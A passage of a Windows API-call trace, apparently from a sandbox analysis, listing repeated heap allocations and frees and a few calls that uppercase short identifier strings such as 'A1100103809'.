Size=0x20) returned 0x2a77fd0 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.695] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.696] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.696] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.696] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0101.697] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0101.697] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73bc0 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0101.697] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0101.698] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73bc0 | out: hHeap=0x2af0000) returned 1 [0101.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0101.699] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0101.699] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0101.699] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0101.699] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0101.700] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0101.701] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0101.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0101.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0101.702] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0101.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a95da8 | out: hHeap=0x2af0000) returned 1 [0101.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 